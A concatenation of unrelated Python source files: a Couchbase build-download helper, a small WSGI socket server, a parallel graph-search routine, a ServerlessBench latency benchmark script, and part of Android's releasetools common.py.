logging.info("Downloading build binary to {0}:{1}..".format(node.ip, filepath))
check_and_retry_download_binary(cmd, node)
log.debug("Done downloading build binary")
def check_and_retry_download_binary_local(node):
log.info("Downloading build binary to {0}..".format(node.build.path))
duration, event, timeout = install_constants.WAIT_TIMES[node.info.deliverable_type][
"download_binary"]
cmd = install_constants.WGET_CMD.format(__get_download_dir(node), node.build.url)
start_time = time.time()
while time.time() < start_time + timeout:
try:
_execute_local(cmd, timeout)
if os.path.exists(node.build.path):
break
time.sleep(duration)
except Exception as e:
log.warn("Unable to download build: {0}, retrying..".format(e.message))
time.sleep(duration)
else:
print_result_and_exit("Unable to download build in {0}s on {1}, exiting".format(timeout,
node.build.path))
def check_file_exists(node, filepath):
output, _ = node.shell.execute_command("ls -lh {0}".format(filepath), debug=params["debug_logs"])
for line in output:
if line.find('No such file or directory') == -1:
return True
return False
def check_and_retry_download_binary(cmd, node):
duration, event, timeout = install_constants.WAIT_TIMES[node.info.deliverable_type]["download_binary"]
start_time = time.time()
while time.time() < start_time + timeout:
try:
node.shell.execute_command(cmd, debug=params["debug_logs"])
if check_file_exists(node, node.build.path):
break
time.sleep(duration)
except Exception as e:
log.warning("Unable to download build: {0}, retrying..".format(e))
time.sleep(duration)
else:
print_result_and_exit("Unable to download build in {0}s on {1}, exiting".format(timeout, node.ip))
def __get_download_dir(node):
os = node.get_os()
if os in install_constants.LINUX_DISTROS:
if node.shell.nonroot:
return install_constants.NON_ROOT_DOWNLOAD_DIR['LINUX_DISTROS']
else:
return install_constants.DOWNLOAD_DIR["LINUX_DISTROS"]
elif os in install_constants.MACOS_VERSIONS:
return install_constants.DOWNLOAD_DIR["MACOS_VERSIONS"]
elif os in install_constants.WINDOWS_SERVER:
return install_constants.DOWNLOAD_DIR["WINDOWS_SERVER"]
def __get_build_binary_name(node):
# couchbase-server-enterprise-6.5.0-4557-centos7.x86_64.rpm
# couchbase-server-enterprise-6.5.0-4557-suse15.x86_64.rpm
# couchbase-server-enterprise-6.5.0-4557-rhel8.x86_64.rpm
# couchbase-server-enterprise-6.5.0-4557-oel7.x86_64.rpm
# couchbase-server-enterprise-6.5.0-4557-amzn2.x86_64.rpm
if node.get_os() in install_constants.X86:
return "{0}-{1}-{2}.{3}.{4}".format(params["cb_edition"],
params["version"],
node.get_os(),
node.info.architecture_type,
node.info.deliverable_type)
# couchbase-server-enterprise_6.5.0-4557-ubuntu16.04_amd64.deb
# couchbase-server-enterprise_6.5.0-4557-debian8_amd64.deb
# couchbase-server-enterprise_6.5.0-4557-windows_amd64.msi
elif node.get_os() in install_constants.AMD64:
if "windows" in node.get_os():
node.info.deliverable_type = "msi"
return "{0}_{1}-{2}_{3}.{4}".format(params["cb_edition"],
params["version"],
node.get_os(),
"amd64",
node.info.deliverable_type)
# couchbase-server-enterprise_6.5.0-4557-macos_x86_64.dmg
elif node.get_os() in install_constants.MACOS_VERSIONS:
return "{0}_{1}-{2}_{3}.{4}".format(params["cb_edition"],
params["version"],
"macos",
node.info.architecture_type,
node.info.deliverable_type)
|
saba_server.py
|
import socket
from threading import Thread
import sys
from urllib.parse import unquote, unquote_plus
from http.client import responses
import datetime
def _500():
return 'HTTP/1.1 500 {0}\r\n\r\n {0}\n'.format(responses[500]).encode("utf-8")
def _301(host, path):
print("{} {}".format(301, r:=responses[301]))
return 'HTTP/1.1 301 {0}\r\nLocation:http://{1}{2}\r\n\r\n {0}\n'.format(r, host, path[:-1]).encode("utf-8")
def remove_w(l, w=['']):
return [a for a in l if a not in w]
def make_formdata(others):
value_dic = {}
_, post_value = others.split('\r\n\r\n')
post_value= unquote_plus(post_value)
try:
for post_v in post_value.split('&'):
key, value = post_v.split('=', 1)
value_dic[key]=value
value_dic['error'] = False
except:
value_dic['error'] = True
return value_dic
def make_formdata_multi(others, val):
value_dic = {}
try:
_, post_value = others.split('\r\n\r\n',1)
value_dic['formdata'] = post_value
value_dic['boundary'] = val.split('=')[1]
value_dic['error'] = False
except:
value_dic['error'] = True
return value_dic
class Saba():
def __init__(self, app, host = '127.0.0.1', port = 8000):
self.host = host
self.port = port
self.request_queue_size = 50
self.app = app
def parse_request(self):
# Parse rquest
# (method, path, protocol) : request line / others : request header
self.method, self.path, others = self.request_data.decode('iso-8859-1').split(' ', 2)
self.protocol, self.r_host, others = others.split('\r\n', 2)
self.path = unquote(self.path)
if '?' in self.path:
self.path, self.query = self.path.split('?', 1)
self.path = self.path+'/'
if self.query[-1] == '/':
self.query = self.query[:-1]
else:
self.query=""
self.r_host = self.r_host.split(': ')[1]
value_dic = {}
self.content_type = ''
if self.method == 'POST':
for o in remove_w(others.split('\r\n')):
if len(o := o.split(': '))==2:
key, val = o
if key=='Content-Type':
if 'multipart/form-data' in val:
value_dic = make_formdata_multi(others, val)
elif val=='application/x-www-form-urlencoded':
value_dic = make_formdata(others)
self.content_type = val
self.post_value = value_dic
print('{} {} {}'.format(datetime.datetime.now(), self.method, self.path), end=' ')
def make_env(self):
env = {
'REQUEST_METHOD' : self.method,
'SCRIPT_NAME' : '',
'PATH_INFO' : self.path,
'QUERY_STRING' : self.query,
'CONTENT_TYPE':self.content_type,
'CONTENT_LENGTH':'',
'SERVER_NAME': 'saba_server/beta',
'SERVER_PORT': self.port,
'SERVER_PROTOCOL':self.protocol,
#HTTP_ Variables
'wsgi.version':(1,0),
'wsgi.url_scheme': "http",#https
'wsgi.input':self.request_data,
'wsgi.errors':sys.stderr,
'wsgi.multithread': True,
'wsgi.multiprocess': False,
'wsgi.run_once': False,
'saba_post_value':self.post_value
}
return env
# Return status & env.
def handle_one_request(self, conn):
self.request_data = b''
# Loop until all data is received.
while True:
# Receive data(maximum 4096 bytes).
data = conn.recv(4096)# Blocking
self.request_data += data
if (len(data)<4096) or (not data):
break
if self.request_data == b'':
return {'status':'500', 'env':None}
self.parse_request()
env = self.make_env()
if len(self.path.split('/')) == 3 and self.path[-1] == '/':
return {'status':'301', 'env':env, 'host':self.r_host}
return {'status':'200', 'env':env}
def keep_swimming(self):
# AF_INET : IPv4/ SOCK_STREAM : TCP/IP
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
# Set some socket options.
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Specify 'IP address' and 'port'.
s.bind((self.host, self.port))
# Wait for connection.
s.listen(self.request_queue_size)
while True:
# When someone comes in, adds the connection and address.
conn, _ = s.accept()
dic = self.handle_one_request(conn)
if dic['env'] is None:
continue
# Create thread.
thread = Thread(target=swimming, args=(conn, dic, self.app), daemon=True)
# Start thread.
thread.start()
#Loop handler.
def swimming(conn, dic, app):
env = dic['env']
# Opne the conection.
with conn:
if dic['status']=='301':
response_data = _301(dic['host'], env['PATH_INFO'])
else:
response_data = make_responce(env, app)
conn.sendall(response_data)
# Make responce.
def make_responce(env, app):
headers = []
status_code = None
def start_response(s, h, exc_info=None):
nonlocal headers, status_code
status_code = s
headers = h
print(s)
response_data = app(env, start_response)
if response_data is None:
response_data=b''
content_length=0
else:
content_length=len(response_data)
status_line = "HTTP/1.1 {}".format(status_code).encode("utf-8")
if len(headers)==0 or status_code is None:
return _500()
else:
headers = [f"{k}: {v}" for k, v in headers]
headers.append('CONTENT_LENGTH: {}'.format(content_length))
headers = '\r\n'.join(headers).encode('utf-8')
response_data=status_line+b'\r\n'+headers+b'\r\n\r\n'+response_data[0]
return response_data
|
Multithreading.py
|
from Algorithm import SearchTree, GraphContainer
from multiprocessing import Process, Queue
import time
def runJob(env, container, q):
tree = SearchTree(container, env)
iterations = 0
startTime = time.time()
for i in range(10000):
if container.isEmpty():
break
tree.nextItr()
iterations += 1
q.put((container, iterations))
def startThread(env, container, q):
tree = None
itr = 0
while len(container.graphs) < 250:
if tree == None:
tree = SearchTree(container, env)
tree.nextItr()
itr += 1
miniCon = GraphContainer()
miniCon.graphs = container.graphs[:250]
container.graphs = container.graphs[250:]
Process(target=runJob, args=(env, miniCon, q)).start()
return itr
def findSolutionParrallel(env, container, threadCount):
startTime = time.time()
liveThreads = 0
itr = 0
q = Queue()
for i in range(threadCount):
if container.isEmpty():
break
itr += startThread(env, container, q)
liveThreads += 1
foundSolution = False
while liveThreads > 0 and not foundSolution:
miniCon, iterations = q.get()
liveThreads -= 1
itr += iterations
for graph in miniCon.graphs:
container.push(graph)
for solution in miniCon.solutions:
container.addSolution(solution)
foundSolution = True
if not foundSolution:
while liveThreads < threadCount:
if container.isEmpty():
break
itr += startThread(env, container, q)
liveThreads += 1
endTime = time.time()
elapsedTime = endTime - startTime
print('Iterations: {: >9,}, Open: {: >9,}, Solutions: {: >3,}, Time: {: >7,.1f}s ({: >7,.1f}g/s), Threads: {}'
.format(itr, len(container.graphs), len(container.solutions), elapsedTime, itr / elapsedTime, liveThreads))
return itr
|
run.py
|
# Copyright (c) 2020 Institution of Parallel and Distributed System, Shanghai Jiao Tong University
# ServerlessBench is licensed under the Mulan PSL v1.
# You can use this software according to the terms and conditions of the Mulan PSL v1.
# You may obtain a copy of Mulan PSL v1 at:
# http://license.coscl.org.cn/MulanPSL
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND, EITHER EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR
# PURPOSE.
# See the Mulan PSL v1 for more details.
import os
import threading
import time
import sys, getopt
# this script should be executed in parent dir of scripts
def client(i,results,loopTimes):
print("client %d start" %i)
command = "./scripts/run-single.sh -R -t " + str(loopTimes)
r = os.popen(command)
text = r.read()
results[i] = text
print("client %d finished" %i)
def warmup(i,warmupTimes):
for j in range(warmupTimes):
r = os.popen("./scripts/action_invoke.sh")
text = r.read()
print("client %d warmup finished" %i)
def main():
argv = getargv()
clientNum = argv[0]
loopTimes = argv[1]
warmupTimes = argv[2]
threads = []
containerName = "alexa"
r = os.popen("docker stop `docker ps | grep %s | awk {'print $1'}`" %containerName)
r.read()
# First: warm up
for i in range(clientNum):
t = threading.Thread(target=warmup,args=(i,warmupTimes))
threads.append(t)
for i in range(clientNum):
threads[i].start()
for i in range(clientNum):
threads[i].join()
print("Warm up complete")
# Second: invoke the actions
# Initialize the results and the clients
threads = []
results = []
for i in range(clientNum):
results.append('')
# Create the clients
for i in range(clientNum):
t = threading.Thread(target=client,args=(i,results,loopTimes))
threads.append(t)
# start the clients
for i in range(clientNum):
threads[i].start()
for i in range(clientNum):
threads[i].join()
outfile = open("result.csv","w")
outfile.write("invokeTime,endTime\n")
latencies = []
minInvokeTime = 0x7fffffffffffffff
maxEndTime = 0
for i in range(clientNum):
# get and parse the result of a client
clientResult = parseResult(results[i])
# print the result of every loop of the client
for j in range(len(clientResult)):
outfile.write(clientResult[j][0] + ',' + clientResult[j][1] + '\n')
# Collect the latency
latency = int(clientResult[j][-1]) - int(clientResult[j][0])
latencies.append(latency)
# Find the first invoked action and the last return one.
if int(clientResult[j][0]) < minInvokeTime:
minInvokeTime = int(clientResult[j][0])
if int(clientResult[j][-1]) > maxEndTime:
maxEndTime = int(clientResult[j][-1])
formatResult(latencies,maxEndTime - minInvokeTime, clientNum, loopTimes, warmupTimes)
def parseResult(result):
lines = result.split('\n')
parsedResults = []
for line in lines:
if line.find("invokeTime") == -1:
continue
parsedTimes = ['','']
i = 0
count = 0
while count < 2:
while i < len(line):
if line[i].isdigit():
parsedTimes[count] = line[i:i+13]
i += 13
count += 1
continue
i += 1
parsedResults.append(parsedTimes)
return parsedResults
def getargv():
if len(sys.argv) != 3 and len(sys.argv) != 4:
print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
exit(0)
if not str.isdigit(sys.argv[1]) or not str.isdigit(sys.argv[2]) or int(sys.argv[1]) < 1 or int(sys.argv[2]) < 1:
print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
print("Client number and loop times must be an positive integer")
exit(0)
if len(sys.argv) == 4:
if not str.isdigit(sys.argv[3]) or int(sys.argv[3]) < 1:
print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
print("Warm up times must be an positive integer")
exit(0)
else:
return (int(sys.argv[1]),int(sys.argv[2]),1)
return (int(sys.argv[1]),int(sys.argv[2]),int(sys.argv[3]))
def formatResult(latencies,duration,client,loop,warmup):
requestNum = len(latencies)
latencies.sort()
duration = float(duration)
# calculate the average latency
total = 0
for latency in latencies:
total += latency
print("\n")
print("------------------ result ---------------------")
print("%s / %d requests finished in %.2f seconds" %(requestNum, (loop * client), (duration/1000)))
print("latency (ms):\navg\t50%\t75%\t90%\t95%\t99%")
if requestNum > 0:
averageLatency = float(total) / requestNum
_50pcLatency = latencies[int(requestNum * 0.5) - 1]
_75pcLatency = latencies[int(requestNum * 0.75) - 1]
_90pcLatency = latencies[int(requestNum * 0.9) - 1]
_95pcLatency = latencies[int(requestNum * 0.95) - 1]
_99pcLatency = latencies[int(requestNum * 0.99) - 1]
print("%.2f\t%d\t%d\t%d\t%d\t%d" %(averageLatency,_50pcLatency,_75pcLatency,_90pcLatency,_95pcLatency,_99pcLatency))
print("throughput (n/s):\n%.2f" %(requestNum / (duration/1000)))
# output result to file
resultfile = open("eval-result.log","a")
resultfile.write("\n\n------------------ (concurrent)result ---------------------\n")
resultfile.write("client: %d, loop_times: %d, warmup_times: %d\n" % (client, loop, warmup))
resultfile.write("%s / %d requests finished in %.2f seconds\n" %(requestNum, (loop * client), (duration/1000)))
resultfile.write("latency (ms):\navg\t50%\t75%\t90%\t95%\t99%\n")
if requestNum > 0:
resultfile.write("%.2f\t%d\t%d\t%d\t%d\t%d\n" %(averageLatency,_50pcLatency,_75pcLatency,_90pcLatency,_95pcLatency,_99pcLatency))
resultfile.write("throughput (n/s):\n%.2f\n" %(requestNum / (duration/1000)))
main()
|
common.py
|
# Copyright (C) 2008 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import errno
import getopt
import getpass
import imp
import os
import platform
import re
import shlex
import shutil
import subprocess
import sys
import tempfile
import threading
import time
import zipfile
import blockimgdiff
import rangelib
from hashlib import sha1 as sha1
class Options(object):
def __init__(self):
platform_search_path = {
"linux2": "out/host/linux-x86",
"darwin": "out/host/darwin-x86",
}
self.search_path = platform_search_path.get(sys.platform, None)
self.signapk_path = "framework/signapk.jar" # Relative to search_path
self.extra_signapk_args = []
self.java_path = "java" # Use the one on the path by default.
self.java_args = "-Xmx2048m" # JVM Args
self.public_key_suffix = ".x509.pem"
self.private_key_suffix = ".pk8"
# use otatools built boot_signer by default
self.boot_signer_path = "boot_signer"
self.boot_signer_args = []
self.verity_signer_path = None
self.verity_signer_args = []
self.verbose = False
self.tempfiles = []
self.device_specific = None
self.extras = {}
self.info_dict = None
self.source_info_dict = None
self.target_info_dict = None
self.worker_threads = None
OPTIONS = Options()
# Values for "certificate" in apkcerts that mean special things.
SPECIAL_CERT_STRINGS = ("PRESIGNED", "EXTERNAL")
class ExternalError(RuntimeError):
pass
def Run(args, **kwargs):
"""Create and return a subprocess.Popen object, printing the command
line on the terminal if -v was specified."""
if OPTIONS.verbose:
print " running: ", " ".join(args)
return subprocess.Popen(args, **kwargs)
def CloseInheritedPipes():
""" Gmake in MAC OS has file descriptor (PIPE) leak. We close those fds
before doing other work."""
if platform.system() != "Darwin":
return
for d in range(3, 1025):
try:
stat = os.fstat(d)
if stat is not None:
pipebit = stat[0] & 0x1000
if pipebit != 0:
os.close(d)
except OSError:
pass
def LoadInfoDict(input_file):
"""Read and parse the META/misc_info.txt key/value pairs from the
input target files and return a dict."""
def read_helper(fn):
if isinstance(input_file, zipfile.ZipFile):
return input_file.read(fn)
else:
path = os.path.join(input_file, *fn.split("/"))
try:
with open(path) as f:
return f.read()
except IOError as e:
if e.errno == errno.ENOENT:
raise KeyError(fn)
d = {}
try:
d = LoadDictionaryFromLines(read_helper("META/misc_info.txt").split("\n"))
except KeyError:
# ok if misc_info.txt doesn't exist
pass
# backwards compatibility: These values used to be in their own
# files. Look for them, in case we're processing an old
# target_files zip.
if "mkyaffs2_extra_flags" not in d:
try:
d["mkyaffs2_extra_flags"] = read_helper(
"META/mkyaffs2-extra-flags.txt").strip()
except KeyError:
# ok if flags don't exist
pass
if "recovery_api_version" not in d:
try:
d["recovery_api_version"] = read_helper(
"META/recovery-api-version.txt").strip()
except KeyError:
raise ValueError("can't find recovery API version in input target-files")
if "tool_extensions" not in d:
try:
d["tool_extensions"] = read_helper("META/tool-extensions.txt").strip()
except KeyError:
# ok if extensions don't exist
pass
if "fstab_version" not in d:
d["fstab_version"] = "1"
try:
data = read_helper("META/imagesizes.txt")
for line in data.split("\n"):
if not line:
continue
name, value = line.split(" ", 1)
if not value:
continue
if name == "blocksize":
d[name] = value
else:
d[name + "_size"] = value
except KeyError:
pass
def makeint(key):
if key in d:
d[key] = int(d[key], 0)
makeint("recovery_api_version")
makeint("blocksize")
makeint("system_size")
makeint("vendor_size")
makeint("userdata_size")
makeint("cache_size")
makeint("recovery_size")
makeint("boot_size")
makeint("fstab_version")
d["fstab"] = LoadRecoveryFSTab(read_helper, d["fstab_version"])
d["build.prop"] = LoadBuildProp(read_helper)
return d
def LoadBuildProp(read_helper):
try:
data = read_helper("SYSTEM/build.prop")
except KeyError:
print "Warning: could not find SYSTEM/build.prop in %s" % zip
data = ""
return LoadDictionaryFromLines(data.split("\n"))
def LoadDictionaryFromLines(lines):
d = {}
for line in lines:
line = line.strip()
if not line or line.startswith("#"):
continue
if "=" in line:
name, value = line.split("=", 1)
d[name] = value
return d
def LoadRecoveryFSTab(read_helper, fstab_version):
class Partition(object):
def __init__(self, mount_point, fs_type, device, length, device2, context):
self.mount_point = mount_point
self.fs_type = fs_type
self.device = device
self.length = length
self.device2 = device2
self.context = context
try:
data = read_helper("RECOVERY/RAMDISK/etc/recovery.fstab")
except KeyError:
print "Warning: could not find RECOVERY/RAMDISK/etc/recovery.fstab"
data = ""
if fstab_version == 1:
d = {}
for line in data.split("\n"):
line = line.strip()
if not line or line.startswith("#"):
continue
pieces = line.split()
if not 3 <= len(pieces) <= 4:
raise ValueError("malformed recovery.fstab line: \"%s\"" % (line,))
options = None
if len(pieces) >= 4:
if pieces[3].startswith("/"):
device2 = pieces[3]
if len(pieces) >= 5:
options = pieces[4]
else:
device2 = None
options = pieces[3]
else:
device2 = None
mount_point = pieces[0]
length = 0
if options:
options = options.split(",")
for i in options:
if i.startswith("length="):
length = int(i[7:])
else:
print "%s: unknown option \"%s\"" % (mount_point, i)
d[mount_point] = Partition(mount_point=mount_point, fs_type=pieces[1],
device=pieces[2], length=length,
device2=device2)
elif fstab_version == 2:
d = {}
for line in data.split("\n"):
line = line.strip()
if not line or line.startswith("#"):
continue
# <src> <mnt_point> <type> <mnt_flags and options> <fs_mgr_flags>
pieces = line.split()
if len(pieces) != 5:
raise ValueError("malformed recovery.fstab line: \"%s\"" % (line,))
# Ignore entries that are managed by vold
options = pieces[4]
if "voldmanaged=" in options:
continue
# It's a good line, parse it
length = 0
options = options.split(",")
for i in options:
if i.startswith("length="):
length = int(i[7:])
else:
# Ignore all unknown options in the unified fstab
continue
mount_flags = pieces[3]
# Honor the SELinux context if present.
context = None
for i in mount_flags.split(","):
if i.startswith("context="):
context = i
mount_point = pieces[1]
d[mount_point] = Partition(mount_point=mount_point, fs_type=pieces[2],
device=pieces[0], length=length,
device2=None, context=context)
else:
raise ValueError("Unknown fstab_version: \"%d\"" % (fstab_version,))
return d
def DumpInfoDict(d):
for k, v in sorted(d.items()):
print "%-25s = (%s) %s" % (k, type(v).__name__, v)
def BuildBootableImage(sourcedir, fs_config_file, info_dict=None):
"""Take a kernel, cmdline, and ramdisk directory from the input (in
'sourcedir'), and turn them into a boot image. Return the image
data, or None if sourcedir does not appear to contains files for
building the requested image."""
if (not os.access(os.path.join(sourcedir, "RAMDISK"), os.F_OK) or
not os.access(os.path.join(sourcedir, "kernel"), os.F_OK)):
return None
if info_dict is None:
info_dict = OPTIONS.info_dict
ramdisk_img = tempfile.NamedTemporaryFile()
img = tempfile.NamedTemporaryFile()
if os.access(fs_config_file, os.F_OK):
cmd = ["mkbootfs", "-f", fs_config_file, os.path.join(sourcedir, "RAMDISK")]
else:
cmd = ["mkbootfs", os.path.join(sourcedir, "RAMDISK")]
p1 = Run(cmd, stdout=subprocess.PIPE)
p2 = Run(["minigzip"],
stdin=p1.stdout, stdout=ramdisk_img.file.fileno())
p2.wait()
p1.wait()
assert p1.returncode == 0, "mkbootfs of %s ramdisk failed" % (sourcedir,)
assert p2.returncode == 0, "minigzip of %s ramdisk failed" % (sourcedir,)
# use MKBOOTIMG from environ, or "mkbootimg" if empty or not set
mkbootimg = os.getenv('MKBOOTIMG') or "mkbootimg"
cmd = [mkbootimg, "--kernel", os.path.join(sourcedir, "kernel")]
fn = os.path.join(sourcedir, "second")
if os.access(fn, os.F_OK):
cmd.append("--second")
cmd.append(fn)
fn = os.path.join(sourcedir, "cmdline")
if os.access(fn, os.F_OK):
cmd.append("--cmdline")
cmd.append(open(fn).read().rstrip("\n"))
fn = os.path.join(sourcedir, "base")
if os.access(fn, os.F_OK):
cmd.append("--base")
cmd.append(open(fn).read().rstrip("\n"))
fn = os.path.join(sourcedir, "pagesize")
if os.access(fn, os.F_OK):
cmd.append("--pagesize")
cmd.append(open(fn).read().rstrip("\n"))
args = info_dict.get("mkbootimg_args", None)
if args and args.strip():
cmd.extend(shlex.split(args))
img_unsigned = None
if info_dict.get("vboot", None):
img_unsigned = tempfile.NamedTemporaryFile()
cmd.extend(["--ramdisk", ramdisk_img.name,
"--output", img_unsigned.name])
else:
cmd.extend(["--ramdisk", ramdisk_img.name,
"--output", img.name])
p = Run(cmd, stdout=subprocess.PIPE)
p.communicate()
assert p.returncode == 0, "mkbootimg of %s image failed" % (
os.path.basename(sourcedir),)
if (info_dict.get("boot_signer", None) == "true" and
info_dict.get("verity_key", None)):
path = "/" + os.path.basename(sourcedir).lower()
cmd = [OPTIONS.boot_signer_path]
cmd.extend(OPTIONS.boot_signer_args)
cmd.extend([path, img.name,
info_dict["verity_key"] + ".pk8",
info_dict["verity_key"] + ".x509.pem", img.name])
p = Run(cmd, stdout=subprocess.PIPE)
p.communicate()
assert p.returncode == 0, "boot_signer of %s image failed" % path
# Sign the image if vboot is non-empty.
elif info_dict.get("vboot", None):
path = "/" + os.path.basename(sourcedir).lower()
img_keyblock = tempfile.NamedTemporaryFile()
cmd = [info_dict["vboot_signer_cmd"], info_dict["futility"],
img_unsigned.name, info_dict["vboot_key"] + ".vbpubk",
info_dict["vboot_key"] + ".vbprivk",
info_dict["vboot_subkey"] + ".vbprivk",
img_keyblock.name,
img.name]
p = Run(cmd, stdout=subprocess.PIPE)
p.communicate()
assert p.returncode == 0, "vboot_signer of %s image failed" % path
# Clean up the temp files.
img_unsigned.close()
img_keyblock.close()
img.seek(os.SEEK_SET, 0)
data = img.read()
ramdisk_img.close()
img.close()
return data
def GetBootableImage(name, prebuilt_name, unpack_dir, tree_subdir,
info_dict=None):
"""Return a File object (with name 'name') with the desired bootable
image. Look for it in 'unpack_dir'/BOOTABLE_IMAGES under the name
'prebuilt_name', otherwise look for it under 'unpack_dir'/IMAGES,
otherwise construct it from the source files in
'unpack_dir'/'tree_subdir'."""
prebuilt_path = os.path.join(unpack_dir, "BOOTABLE_IMAGES", prebuilt_name)
if os.path.exists(prebuilt_path):
print "using prebuilt %s from BOOTABLE_IMAGES..." % (prebuilt_name,)
return File.FromLocalFile(name, prebuilt_path)
prebuilt_path = os.path.join(unpack_dir, "IMAGES", prebuilt_name)
if os.path.exists(prebuilt_path):
print "using prebuilt %s from IMAGES..." % (prebuilt_name,)
return File.FromLocalFile(name, prebuilt_path)
print "building image from target_files %s..." % (tree_subdir,)
fs_config = "META/" + tree_subdir.lower() + "_filesystem_config.txt"
data = BuildBootableImage(os.path.join(unpack_dir, tree_subdir),
os.path.join(unpack_dir, fs_config),
info_dict)
if data:
return File(name, data)
return None
def UnzipTemp(filename, pattern=None):
"""Unzip the given archive into a temporary directory and return the name.
If filename is of the form "foo.zip+bar.zip", unzip foo.zip into a
temp dir, then unzip bar.zip into that_dir/BOOTABLE_IMAGES.
Returns (tempdir, zipobj) where zipobj is a zipfile.ZipFile (of the
main file), open for reading.
"""
tmp = tempfile.mkdtemp(prefix="targetfiles-")
OPTIONS.tempfiles.append(tmp)
def unzip_to_dir(filename, dirname):
cmd = ["unzip", "-o", "-q", filename, "-d", dirname]
if pattern is not None:
cmd.append(pattern)
p = Run(cmd, stdout=subprocess.PIPE)
p.communicate()
if p.returncode != 0:
raise ExternalError("failed to unzip input target-files \"%s\"" %
(filename,))
m = re.match(r"^(.*[.]zip)\+(.*[.]zip)$", filename, re.IGNORECASE)
if m:
unzip_to_dir(m.group(1), tmp)
unzip_to_dir(m.group(2), os.path.join(tmp, "BOOTABLE_IMAGES"))
filename = m.group(1)
else:
unzip_to_dir(filename, tmp)
return tmp, zipfile.ZipFile(filename, "r")
def GetKeyPasswords(keylist):
"""Given a list of keys, prompt the user to enter passwords for
those which require them. Return a {key: password} dict. password
will be None if the key has no password."""
no_passwords = []
need_passwords = []
key_passwords = {}
devnull = open("/dev/null", "w+b")
for k in sorted(keylist):
# We don't need a password for things that aren't really keys.
if k in SPECIAL_CERT_STRINGS:
no_passwords.append(k)
continue
p = Run(["openssl", "pkcs8", "-in", k+OPTIONS.private_key_suffix,
"-inform", "DER", "-nocrypt"],
stdin=devnull.fileno(),
stdout=devnull.fileno(),
stderr=subprocess.STDOUT)
p.communicate()
if p.returncode == 0:
# Definitely an unencrypted key.
no_passwords.append(k)
else:
p = Run(["openssl", "pkcs8", "-in", k+OPTIONS.private_key_suffix,
"-inform", "DER", "-passin", "pass:"],
stdin=devnull.fileno(),
stdout=devnull.fileno(),
stderr=subprocess.PIPE)
_, stderr = p.communicate()
if p.returncode == 0:
# Encrypted key with empty string as password.
key_passwords[k] = ''
elif stderr.startswith('Error decrypting key'):
# Definitely encrypted key.
# It would have said "Error reading key" if it didn't parse correctly.
need_passwords.append(k)
else:
# Potentially, a type of key that openssl doesn't understand.
# We'll let the routines in signapk.jar handle it.
no_passwords.append(k)
devnull.close()
key_passwords.update(PasswordManager().GetPasswords(need_passwords))
key_passwords.update(dict.fromkeys(no_passwords, None))
return key_passwords
def SignFile(input_name, output_name, key, password, align=None,
whole_file=False):
"""Sign the input_name zip/jar/apk, producing output_name. Use the
given key and password (the latter may be None if the key does not
have a password.
If align is an integer > 1, zipalign is run to align stored files in
the output zip on 'align'-byte boundaries.
If whole_file is true, use the "-w" option to SignApk to embed a
signature that covers the whole file in the archive comment of the
zip file.
"""
if align == 0 or align == 1:
align = None
if align:
temp = tempfile.NamedTemporaryFile()
sign_name = temp.name
else:
sign_name = output_name
cmd = [OPTIONS.java_path, OPTIONS.java_args, "-jar",
os.path.join(OPTIONS.search_path, OPTIONS.signapk_path)]
cmd.extend(OPTIONS.extra_signapk_args)
if whole_file:
cmd.append("-w")
cmd.extend([key + OPTIONS.public_key_suffix,
key + OPTIONS.private_key_suffix,
input_name, sign_name])
p = Run(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
if password is not None:
password += "\n"
p.communicate(password)
if p.returncode != 0:
raise ExternalError("signapk.jar failed: return code %s" % (p.returncode,))
if align:
p = Run(["zipalign", "-f", "-p", str(align), sign_name, output_name])
p.communicate()
if p.returncode != 0:
raise ExternalError("zipalign failed: return code %s" % (p.returncode,))
temp.close()
def CheckSize(data, target, info_dict):
"""Check the data string passed against the max size limit, if
any, for the given target. Raise exception if the data is too big.
Print a warning if the data is nearing the maximum size."""
if target.endswith(".img"):
target = target[:-4]
mount_point = "/" + target
fs_type = None
limit = None
if info_dict["fstab"]:
if mount_point == "/userdata":
mount_point = "/data"
p = info_dict["fstab"][mount_point]
fs_type = p.fs_type
device = p.device
if "/" in device:
device = device[device.rfind("/")+1:]
limit = info_dict.get(device + "_size", None)
if not fs_type or not limit:
return
if fs_type == "yaffs2":
# image size should be increased by 1/64th to account for the
# spare area (64 bytes per 2k page)
limit = limit / 2048 * (2048+64)
size = len(data)
pct = float(size) * 100.0 / limit
msg = "%s size (%d) is %.2f%% of limit (%d)" % (target, size, pct, limit)
if pct >= 99.0:
raise ExternalError(msg)
elif pct >= 95.0:
print
print " WARNING: ", msg
print
elif OPTIONS.verbose:
print " ", msg
def ReadApkCerts(tf_zip):
"""Given a target_files ZipFile, parse the META/apkcerts.txt file
and return a {package: cert} dict."""
certmap = {}
for line in tf_zip.read("META/apkcerts.txt").split("\n"):
line = line.strip()
if not line:
continue
m = re.match(r'^name="(.*)"\s+certificate="(.*)"\s+'
r'private_key="(.*)"$', line)
if m:
name, cert, privkey = m.groups()
public_key_suffix_len = len(OPTIONS.public_key_suffix)
private_key_suffix_len = len(OPTIONS.private_key_suffix)
if cert in SPECIAL_CERT_STRINGS and not privkey:
certmap[name] = cert
elif (cert.endswith(OPTIONS.public_key_suffix) and
privkey.endswith(OPTIONS.private_key_suffix) and
cert[:-public_key_suffix_len] == privkey[:-private_key_suffix_len]):
certmap[name] = cert[:-public_key_suffix_len]
else:
raise ValueError("failed to parse line from apkcerts.txt:\n" + line)
return certmap
COMMON_DOCSTRING = """
-p (--path) <dir>
Prepend <dir>/bin to the list of places to search for binaries
run by this script, and expect to find jars in <dir>/framework.
-s (--device_specific) <file>
Path to the python module containing device-specific
releasetools code.
